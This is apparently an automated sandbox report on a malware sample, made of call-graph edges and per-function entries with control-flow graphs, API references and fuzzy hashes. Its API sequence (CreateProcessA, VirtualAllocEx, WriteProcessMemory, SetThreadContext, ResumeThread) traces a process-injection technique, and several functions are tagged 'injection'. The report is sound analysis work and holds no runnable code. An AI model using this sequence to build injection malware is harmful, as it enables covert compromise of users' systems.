19420->19422 19423 7169be4 2 API calls 19420->19423 19424 71693f5 2 API calls 19420->19424 19425 71699c2 4 API calls 19420->19425 19426 7169d42 2 API calls 19420->19426 19427 7169820 2 API calls 19420->19427 19428 716974e 2 API calls 19420->19428 19429 7169d8f 2 API calls 19420->19429 19430 716954b 2 API calls 19420->19430 19431 7169c3b 4 API calls 19420->19431 19432 7169569 4 API calls 19420->19432 19433 7169659 2 API calls 19420->19433 19421 7168dcd 19421->19401 19422->19421 19423->19421 19424->19421 19425->19421 19426->19421 19427->19421 19428->19421 19429->19421 19430->19421 19431->19421 19432->19421 19433->19421 19504 7167aa0 19434->19504 19508 7167a99 19434->19508 19435 7169c12 19439 7169f3b 19438->19439 19440 71693f4 19438->19440 19512 7167d1c 19440->19512 19516 7167d28 19440->19516 19445 7169662 19444->19445 19520 71679e0 19445->19520 19524 71679d9 19445->19524 19446 716971f 19452 716956e 19449->19452 19450 7169649 19451 71697b6 19450->19451 19528 7167b90 19450->19528 19532 7167b88 19450->19532 19452->19450 19452->19451 19536 716a0e8 19452->19536 19541 716a0f8 19452->19541 19546 716a091 19452->19546 19459 7169c44 19458->19459 19460 7169cb0 19459->19460 19462 7167900 SetThreadContext 19459->19462 19463 7167908 SetThreadContext 19459->19463 19560 7167850 19460->19560 19564 7167858 19460->19564 19461 7169e3a 19461->19406 19462->19460 19463->19460 19467 7169846 19466->19467 19468 7169558 19466->19468 19469 7167aa0 WriteProcessMemory 19467->19469 19470 7167a99 WriteProcessMemory 19467->19470 19469->19468 19470->19468 19472 7169d98 19471->19472 19474 7167850 ResumeThread 19472->19474 19475 7167858 ResumeThread 19472->19475 19473 7169e3a 19473->19406 19474->19473 19475->19473 19477 7169758 19476->19477 19479 7167b90 ReadProcessMemory 19477->19479 19480 7167b88 ReadProcessMemory 19477->19480 19478 71697b6 19479->19478 19480->19478 19482 716982a 19481->19482 19484 7167aa0 WriteProcessMemory 19482->19484 19485 7167a99 WriteProcessMemory 19482->19485 19483 7169867 19484->19483 19485->19483 19488 7167aa0 WriteProcessMemory 19486->19488 19489 7167a99 WriteProcessMemory 19486->19489 19487 7169d66 19488->19487 19489->19487 19491 71699cc 19490->19491 19492 7169774 19491->19492 19494 716a091 2 API calls 19491->19494 19495 716a0f8 2 API calls 19491->19495 19496 716a0e8 2 API calls 19491->19496 19493 71697b6 19492->19493 19497 7167b90 ReadProcessMemory 19492->19497 19498 7167b88 ReadProcessMemory 19492->19498 19494->19492 19495->19492 19496->19492 19497->19493 19498->19493 19500 716942a 19499->19500 19502 7167d1c CreateProcessA 19500->19502 19503 7167d28 CreateProcessA 19500->19503 19501 71694c9 19502->19501 19503->19501 19505 7167aa2 WriteProcessMemory 19504->19505 19507 7167b3f 19505->19507 19507->19435 19509 7167a9c WriteProcessMemory 19508->19509 19511 7167b3f 19509->19511 19511->19435 19513 7167d21 CreateProcessA 19512->19513 19515 7167f73 19513->19515 19517 7167d2a 19516->19517 19517->19517 19518 7167f16 CreateProcessA 19517->19518 19519 7167f73 19518->19519 19519->19519 19521 71679e2 VirtualAllocEx 19520->19521 19523 7167a5d 19521->19523 19523->19446 19525 71679dc VirtualAllocEx 19524->19525 19527 7167a5d 19525->19527 19527->19446 19529 7167bdb ReadProcessMemory 19528->19529 19531 7167c1f 19529->19531 19531->19451 19533 7167b8c ReadProcessMemory 19532->19533 19535 7167c1f 19533->19535 19535->19451 19537 716a0f8 19536->19537 19552 7167900 19537->19552 19556 7167908 19537->19556 19538 716a144 19538->19450 19542 716a0fa 19541->19542 19544 7167900 SetThreadContext 19542->19544 19545 7167908 SetThreadContext 19542->19545 19543 716a144 19543->19450 19544->19543 19545->19543 19547 716a09a 19546->19547 19548 716a094 19546->19548 19547->19450 19548->19547 19550 7167900 SetThreadContext 19548->19550 19551 7167908 SetThreadContext 19548->19551 19549 716a144 19549->19450 19550->19549 19551->19549 19553 7167908 SetThreadContext 19552->19553 19555 7167995 19553->19555 19555->19538 19557 716790e SetThreadContext 19556->19557 19559 7167995 19557->19559 19559->19538 19561 7167854 ResumeThread 19560->19561 19563 71678c9 19561->19563 19563->19461 19565 716785a ResumeThread 19564->19565 19567 71678c9 19565->19567 19567->19461

                                                      Executed Functions

                                                      Function 0275E6D8 Relevance: .3, Instructions: 315COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f752da08e56c1d48df8669cf1f78c020fa0472a0fb59068326af00ec39561a8
                                                      • Instruction ID: f24d0ff622b529f53cb55627081a4c10f4c55f07457b66684672041c319a9a0b
                                                      • Opcode Fuzzy Hash: 0f752da08e56c1d48df8669cf1f78c020fa0472a0fb59068326af00ec39561a8
                                                      • Instruction Fuzzy Hash: 7812D7F1C917468BE310CF65E8981993F61F745328BD2CB29DA612BAE0D7B4116ECF48
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0275E6C8 Relevance: .2, Instructions: 223COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ba5abb8149f4db6d8ee01d2a467dc20a8f97ef26800bfa77a0cf4f35714b5f25
                                                      • Instruction ID: 7a7e7f915178af257a3c17ec80b4c0235f921a4eb85e07f19d686d2367570ce0
                                                      • Opcode Fuzzy Hash: ba5abb8149f4db6d8ee01d2a467dc20a8f97ef26800bfa77a0cf4f35714b5f25
                                                      • Instruction Fuzzy Hash: BFC13AB1C917468BE310CF65E8881897F71FB85328F92CB29D9612B6E0D7B4146ECF48
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07167D1C Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 7167d1c-7167d22 2 7167d24-7167d26 0->2 3 7167d2a-7167d2d 0->3 4 7167d2e-7167dbd 2->4 5 7167d28-7167d29 2->5 3->4 7 7167df6-7167e16 4->7 8 7167dbf-7167dc9 4->8 5->3 13 7167e4f-7167e7e 7->13 14 7167e18-7167e22 7->14 8->7 9 7167dcb-7167dcd 8->9 11 7167df0-7167df3 9->11 12 7167dcf-7167dd9 9->12 11->7 15 7167ddd-7167dec 12->15 16 7167ddb 12->16 24 7167eb7-7167f71 CreateProcessA 13->24 25 7167e80-7167e8a 13->25 14->13 17 7167e24-7167e26 14->17 15->15 18 7167dee 15->18 16->15 19 7167e28-7167e32 17->19 20 7167e49-7167e4c 17->20 18->11 22 7167e36-7167e45 19->22 23 7167e34 19->23 20->13 22->22 26 7167e47 22->26 23->22 36 7167f73-7167f79 24->36 37 7167f7a-7168000 24->37 25->24 27 7167e8c-7167e8e 25->27 26->20 28 7167e90-7167e9a 27->28 29 7167eb1-7167eb4 27->29 31 7167e9e-7167ead 28->31 32 7167e9c 28->32 29->24 31->31 33 7167eaf 31->33 32->31 33->29 36->37 47 7168002-7168006 37->47 48 7168010-7168014 37->48 47->48 49 7168008 47->49 50 7168016-716801a 48->50 51 7168024-7168028 48->51 49->48 50->51 52 716801c 50->52 53 716802a-716802e 51->53 54 7168038-716803c 51->54 52->51 53->54 55 7168030 53->55 56 716804e-7168055 54->56 57 716803e-7168044 54->57 55->54 58 7168057-7168066 56->58 59 716806c 56->59 57->56 58->59 61 716806d 59->61 61->61
                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07167F5E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 9e3feb74a27da7f61841ada3d6c51edefcd350d9726bfdc077dc23b7b6ca443f
                                                      • Instruction ID: 48e7759cbee78a9976a634189e6d692c912495a511557d45179980627e965700
                                                      • Opcode Fuzzy Hash: 9e3feb74a27da7f61841ada3d6c51edefcd350d9726bfdc077dc23b7b6ca443f
                                                      • Instruction Fuzzy Hash: B6A16CB1D00219CFDB15CFA8C984BEEBBB2BF48318F148569D819B7280DB749995CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07167D28 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 62 7167d28-7167dbd 66 7167df6-7167e16 62->66 67 7167dbf-7167dc9 62->67 72 7167e4f-7167e7e 66->72 73 7167e18-7167e22 66->73 67->66 68 7167dcb-7167dcd 67->68 70 7167df0-7167df3 68->70 71 7167dcf-7167dd9 68->71 70->66 74 7167ddd-7167dec 71->74 75 7167ddb 71->75 83 7167eb7-7167f71 CreateProcessA 72->83 84 7167e80-7167e8a 72->84 73->72 76 7167e24-7167e26 73->76 74->74 77 7167dee 74->77 75->74 78 7167e28-7167e32 76->78 79 7167e49-7167e4c 76->79 77->70 81 7167e36-7167e45 78->81 82 7167e34 78->82 79->72 81->81 85 7167e47 81->85 82->81 95 7167f73-7167f79 83->95 96 7167f7a-7168000 83->96 84->83 86 7167e8c-7167e8e 84->86 85->79 87 7167e90-7167e9a 86->87 88 7167eb1-7167eb4 86->88 90 7167e9e-7167ead 87->90 91 7167e9c 87->91 88->83 90->90 92 7167eaf 90->92 91->90 92->88 95->96 106 7168002-7168006 96->106 107 7168010-7168014 96->107 106->107 108 7168008 106->108 109 7168016-716801a 107->109 110 7168024-7168028 107->110 108->107 109->110 111 716801c 109->111 112 716802a-716802e 110->112 113 7168038-716803c 110->113 111->110 112->113 114 7168030 112->114 115 716804e-7168055 113->115 116 716803e-7168044 113->116 114->113 117 7168057-7168066 115->117 118 716806c 115->118 116->115 117->118 120 716806d 118->120 120->120
                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07167F5E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: a042bc415e10ea4524ce21cc54352fa805ebea85e0fe25f2b249a86194f7058b
                                                      • Instruction ID: 04365f2f97eedb9b1bb4645c94174750167ff629433c0c134ebac24213f8cf5e
                                                      • Opcode Fuzzy Hash: a042bc415e10ea4524ce21cc54352fa805ebea85e0fe25f2b249a86194f7058b
                                                      • Instruction Fuzzy Hash: F4916CB1D00219CFDB15CFA8C984BEEBBB2BF44318F148569D819B7280DB749995CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 027597F0 Relevance: 1.7, APIs: 1, Instructions: 190COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 121 27597f0-2759805 call 2758244 124 2759807 121->124 125 275981b-275981f 121->125 174 275980d call 2759a78 124->174 175 275980d call 2759a6b 124->175 126 2759821-275982b 125->126 127 2759833-2759874 125->127 126->127 132 2759876-275987e 127->132 133 2759881-275988f 127->133 128 2759813-2759815 128->125 129 2759950-2759a10 128->129 169 2759a12-2759a15 129->169 170 2759a18-2759a43 GetModuleHandleW 129->170 132->133 135 2759891-2759896 133->135 136 27598b3-27598b5 133->136 138 27598a1 135->138 139 2759898-275989f call 2758250 135->139 137 27598b8-27598bf 136->137 141 27598c1-27598c9 137->141 142 27598cc-27598d3 137->142 140 27598a3-27598b1 138->140 139->140 140->137 141->142 145 27598d5-27598dd 142->145 146 27598e0-27598e9 call 2758260 142->146 145->146 151 27598f6-27598fb 146->151 152 27598eb-27598f3 146->152 154 27598fd-2759904 151->154 155 2759919-275991d 151->155 152->151 154->155 157 2759906-2759916 call 27593dc call 27593ec 154->157 176 2759920 call 2759d80 155->176 177 2759920 call 2759d7b 155->177 157->155 158 2759923-2759926 161 2759949-275994f 158->161 162 2759928-2759946 158->162 162->161 169->170 171 2759a45-2759a4b 170->171 172 2759a4c-2759a60 170->172 171->172 174->128 175->128 176->158 177->158
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02759A36
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 124da0b3b197d69ec1acaf2f5fb669a153ff03410dce115c52cc6bfe0a95f574
                                                      • Instruction ID: d757c21eb429ed456904e245b45aa41c587279bbe50e2cff7c17bff2c5e8bf36
                                                      • Opcode Fuzzy Hash: 124da0b3b197d69ec1acaf2f5fb669a153ff03410dce115c52cc6bfe0a95f574
                                                      • Instruction Fuzzy Hash: 5F711370A00B15CFDB24DF6AD15579ABBF5BF88304F008A2AD94AD7A50DB78E805CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 027553F5 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 195 27553f5-27553f6 196 27553f8-27553f9 195->196 197 27553fa 195->197 196->197 198 27553fc 197->198 199 27553fe-27554c1 CreateActCtxA 197->199 198->199 201 27554c3-27554c9 199->201 202 27554ca-2755524 199->202 201->202 209 2755526-2755529 202->209 210 2755533-2755537 202->210 209->210 211 2755539-2755545 210->211 212 2755548 210->212 211->212 214 2755549 212->214 214->214
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3de2c9b2691367efb8933fe62855bb30e8eb90242afc444df4838f09ef0687e2
                                                      • Instruction ID: 6aa3b30acefe9177acfd2953ebd366f58319c4f0497cc8201d1e350b0914c9bd
                                                      • Opcode Fuzzy Hash: 3de2c9b2691367efb8933fe62855bb30e8eb90242afc444df4838f09ef0687e2
                                                      • Instruction Fuzzy Hash: 3741F370D00629CFDB14CFA9C9447CDFBB6BF49308F208569D419AB251DBB5A946CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02753CC0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 178 2753cc0-27554c1 CreateActCtxA 181 27554c3-27554c9 178->181 182 27554ca-2755524 178->182 181->182 189 2755526-2755529 182->189 190 2755533-2755537 182->190 189->190 191 2755539-2755545 190->191 192 2755548 190->192 191->192 194 2755549 192->194 194->194
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 027554B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 5acccd85d77bbab6bbd1cccf8f7886d962259cb2d7f79cf8b5c6f1e91675d222
                                                      • Instruction ID: 7566b8926e817d0c4542daa3d247084c94086f1e9e8d097a3c926d18a50b010a
                                                      • Opcode Fuzzy Hash: 5acccd85d77bbab6bbd1cccf8f7886d962259cb2d7f79cf8b5c6f1e91675d222
                                                      • Instruction Fuzzy Hash: CA41D070C00628CBDB24CFA9C944BDEBBB6BF49308F608569D419BB251DBB5A945CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07167A99 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 215 7167a99-7167a9a 216 7167aa2-7167aa5 215->216 217 7167a9c-7167a9e 215->217 218 7167aa6-7167aee 216->218 217->218 219 7167aa0-7167aa1 217->219 221 7167af0-7167afc 218->221 222 7167afe-7167b3d WriteProcessMemory 218->222 219->216 221->222 224 7167b46-7167b76 222->224 225 7167b3f-7167b45 222->225 225->224
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07167B30
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 825cdae6d20ee3ca95f85e0cf9bc6d5f29c20ca64d204c980cfcec776f41839c
                                                      • Instruction ID: 2ffba8989a8c9f17c8a799e25e022cd258cc6a7cff65bf820332926afa68717d
                                                      • Opcode Fuzzy Hash: 825cdae6d20ee3ca95f85e0cf9bc6d5f29c20ca64d204c980cfcec776f41839c
                                                      • Instruction Fuzzy Hash: B32159B19003099FCB10CFA9C984BEEBBF5BF48318F148429E918A7280D7789955CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07167B88 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 229 7167b88-7167c1d ReadProcessMemory 234 7167c26-7167c56 229->234 235 7167c1f-7167c25 229->235 235->234
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07167C10
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: e4b4c746315d78efe38b6790555d2a06f76bbaedd4cb9ba49e6d53120bda0aa1
                                                      • Instruction ID: af40d10363fc8ac4adb10767691266da47f2541b64cda8d65b41ff391f5437ff
                                                      • Opcode Fuzzy Hash: e4b4c746315d78efe38b6790555d2a06f76bbaedd4cb9ba49e6d53120bda0aa1
                                                      • Instruction Fuzzy Hash: C92139B1C003199FCB10CFA9D984AEEBBF5FF48314F108829E529A7250D7389955CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07167AA0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 239 7167aa0-7167aee 243 7167af0-7167afc 239->243 244 7167afe-7167b3d WriteProcessMemory 239->244 243->244 246 7167b46-7167b76 244->246 247 7167b3f-7167b45 244->247 247->246
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07167B30
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 252793b0311a7489a8801560bd0675e6e1bc873589e64fdead95e7bca24cd91f
                                                      • Instruction ID: 39ba648c5c5293c60d29c813de49625a1ce6aa616bc29680f5a9fee6046ac5e7
                                                      • Opcode Fuzzy Hash: 252793b0311a7489a8801560bd0675e6e1bc873589e64fdead95e7bca24cd91f
                                                      • Instruction Fuzzy Hash: 9E2127B19003599FCF10CFA9C984BDEBBF5FF48318F148829E919A7290D7789954CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07167900 Relevance: 1.6, APIs: 1, Instructions: 65threadinjectionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 257 7167900-7167905 258 716790e-7167953 257->258 259 7167908-716790d 257->259 261 7167955-7167961 258->261 262 7167963-7167993 SetThreadContext 258->262 259->258 261->262 264 7167995-716799b 262->264 265 716799c-71679cc 262->265 264->265
                                                      APIs
                                                      • SetThreadContext.KERNELBASE(?,00000000), ref: 07167986
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: 204f42c6919a020494fd77dee97865abddee35a36ab2de5674c5eb51fdcde223
                                                      • Instruction ID: 636d92c7e3c5c71ead86f0425a6235be1ad253fd9346f65d36f906da24b27172
                                                      • Opcode Fuzzy Hash: 204f42c6919a020494fd77dee97865abddee35a36ab2de5674c5eb51fdcde223
                                                      • Instruction Fuzzy Hash: 6D2139B1D103098FDB10DFAAC5887EEBBF5AF48328F148429D459B7280DB789945CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02759790 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 251 2759790-275baac DuplicateHandle 253 275bab5-275bad2 251->253 254 275baae-275bab4 251->254 254->253
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0275B9DE,?,?,?,?,?), ref: 0275BA9F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 98fa89c6b5c35a0abf094ee2b2693f1b58d0375efa2b667e6a28d90df8f38597
                                                      • Instruction ID: 937de418f51763fed2b0816c457200f8f1e700454ded314afafdb79d1255b098
                                                      • Opcode Fuzzy Hash: 98fa89c6b5c35a0abf094ee2b2693f1b58d0375efa2b667e6a28d90df8f38597
                                                      • Instruction Fuzzy Hash: B021E5B59002189FDB10CFA9D584AEEFBF8EB48314F14841AE915B7310D378A944CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07167B90 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 280 7167b90-7167c1d ReadProcessMemory 283 7167c26-7167c56 280->283 284 7167c1f-7167c25 280->284 284->283
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07167C10
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 150455ebbffd7faa2e971c9e838b494ea6639dae4e00a5da28ff75d024650762
                                                      • Instruction ID: c8e28c5fd78b45d1104d5db3b22b13d62ce78c02b8943ef4eebaf82b1ea3e959
                                                      • Opcode Fuzzy Hash: 150455ebbffd7faa2e971c9e838b494ea6639dae4e00a5da28ff75d024650762
                                                      • Instruction Fuzzy Hash: 8E2128B1D003199FCB10CFA9D984AEEBBF5FF48324F108829E529A7250D7789954CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07167908 Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 269 7167908-7167953 272 7167955-7167961 269->272 273 7167963-7167993 SetThreadContext 269->273 272->273 275 7167995-716799b 273->275 276 716799c-71679cc 273->276 275->276
                                                      APIs
                                                      • SetThreadContext.KERNELBASE(?,00000000), ref: 07167986
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: c25f84918bef6ccda4016113724a317b89ff6c7bf90d440f749b5afb4470c88d
                                                      • Instruction ID: 149b580a042dfb56aec3b67ebfe77f82044ef7cb2a419a6dbb84e6e0e56a3514
                                                      • Opcode Fuzzy Hash: c25f84918bef6ccda4016113724a317b89ff6c7bf90d440f749b5afb4470c88d
                                                      • Instruction Fuzzy Hash: 6A2138B1D003098FDB10CFAAC5847EEBBF4AF48328F148429D459A7280DB78A945CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02759C50 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 288 2759c50-2759c52 289 2759c54-2759c55 288->289 290 2759c56-2759c98 288->290 289->290 291 2759c34-2759c3e 289->291 292 2759ca0-2759ccf LoadLibraryExW 290->292 293 2759c9a-2759c9d 290->293 294 2759cd1-2759cd7 292->294 295 2759cd8-2759cf5 292->295 293->292 294->295
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02759AB1,00000800,00000000,00000000), ref: 02759CC2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 38bf8552f842ffa2bf04d56b95f63161b256352d47eb2269161f0f84492ce1fb
                                                      • Instruction ID: 14c3eca93b2e5f3fafeaed7caeb99afa492c6d64fd5a102cfbb55aeab5c00812
                                                      • Opcode Fuzzy Hash: 38bf8552f842ffa2bf04d56b95f63161b256352d47eb2269161f0f84492ce1fb
                                                      • Instruction Fuzzy Hash: 722158B6900219CFDB10CFAAD544BDEFBF4EB88364F14842AD929A7600C7799545CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0275BA13 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 299 275ba13-275baac DuplicateHandle 300 275bab5-275bad2 299->300 301 275baae-275bab4 299->301 301->300
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0275B9DE,?,?,?,?,?), ref: 0275BA9F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 2030f09ba25f9e5f1e714b9d848227a8b0b44dd4b4bedbdba8805a1a3d6efe78
                                                      • Instruction ID: 3c11825495ba0f9f4e96750b717f132f25a91949f890560fee13bd22d5738f85
